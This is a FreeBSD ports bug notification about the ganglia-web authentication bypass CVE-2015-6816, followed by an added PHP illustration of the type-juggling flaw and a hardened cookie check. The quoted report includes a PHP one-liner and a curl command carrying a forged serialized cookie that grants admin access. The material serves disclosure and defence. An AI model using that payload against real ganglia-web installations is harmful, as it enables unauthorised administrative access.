Date: Mon, 07 Sep 2015 02:36:16 +0000
From: bugzilla-noreply@freebsd.org
To: freebsd-ports-bugs@FreeBSD.org
Subject: [Bug 202940] sysutils/ganglia-webfrontend: Ganglia-web auth bypass (CVE-2015-6816)
Message-ID: <bug-202940-13@https.bugs.freebsd.org/bugzilla/>

https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=202940

Bug ID: 202940
Summary: sysutils/ganglia-webfrontend: Ganglia-web auth bypass (CVE-2015-6816)
Product: Ports & Packages
Version: Latest
Hardware: Any
OS: Any
Status: New
Severity: Affects Some People
Priority: ---
Component: Individual Port(s)
Assignee: freebsd-ports-bugs@FreeBSD.org
Reporter: junovitch@freebsd.org
CC: jrm@ftfl.ca
Flags: maintainer-feedback?(jrm@ftfl.ca)

Maintainer of sysutils/ganglia-webfrontend,

A security issue has been reported against this port.

References:

http://seclists.org/oss-sec/2015/q3/494

"It's easy to bypass auth by using boolean serialization like this:

$ php -r "echo urlencode(serialize(array('user'=>'admin', 'group'=>'admin', 'token'=>true)));

// Found by d90.andrew
// Exploit:
curl -H 'Cookie: a%3A3%3A%7Bs%3A4%3A%22user%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22group%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22token%22%3Bb%3A1%3B%7D'"

http://seclists.org/oss-sec/2015/q3/502

"Use CVE-2015-6816."

https://github.com/ganglia/ganglia-web/issues/267

--
You are receiving this mail because:
You are the assignee for the bug.
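
The quoted report turns on PHP type juggling: unserialize() restores a boolean true for the token field, and a loose "==" comparison treats true as equal to any non-empty string. The following is an added illustration of that weak pattern beside a hardened one; it is not ganglia-web's code and not part of the original message, and SECRET, expected_token(), check_weak() and check_strict() are hypothetical names with a constructed token scheme.

```php
<?php
// Illustration only: SECRET, expected_token() and both check functions are
// hypothetical, not taken from ganglia-web. The token scheme is an assumption.
const SECRET = 'constructed-demo-secret';

function expected_token(string $user): string {
    return hash_hmac('sha256', $user, SECRET);
}

// Weak pattern: unserialize() restores client-chosen types, and "==" converts
// both operands to bool when one of them is a bool, so a token of true matches
// any non-empty expected token.
function check_weak(string $cookie): bool {
    $data = @unserialize($cookie);
    if (!is_array($data) || !isset($data['user'], $data['token'])) {
        return false;
    }
    return expected_token((string)$data['user']) == $data['token'];
}

// Hardened pattern: JSON cannot carry PHP objects, every field is type-checked,
// and hash_equals() compares two strings strictly and in constant time.
function check_strict(string $cookie): bool {
    $data = json_decode($cookie, true);
    if (!is_array($data)
        || !isset($data['user'], $data['token'])
        || !is_string($data['user'])
        || !is_string($data['token'])) {
        return false;
    }
    return hash_equals(expected_token($data['user']), $data['token']);
}

// Constructed inputs: the field layout from the report (token is boolean true)
// and a cookie carrying a genuine token.
$forged = ['user' => 'admin', 'group' => 'admin', 'token' => true];
$valid  = ['user' => 'admin', 'group' => 'admin', 'token' => expected_token('admin')];

var_dump(check_weak(serialize($forged)));      // weak check, boolean token
var_dump(check_strict(json_encode($forged)));  // strict check, boolean token
var_dump(check_strict(json_encode($valid)));   // strict check, genuine token
```

The same type check is the useful signal on the detection side: a session cookie whose token field deserializes to anything other than a string is worth logging and rejecting.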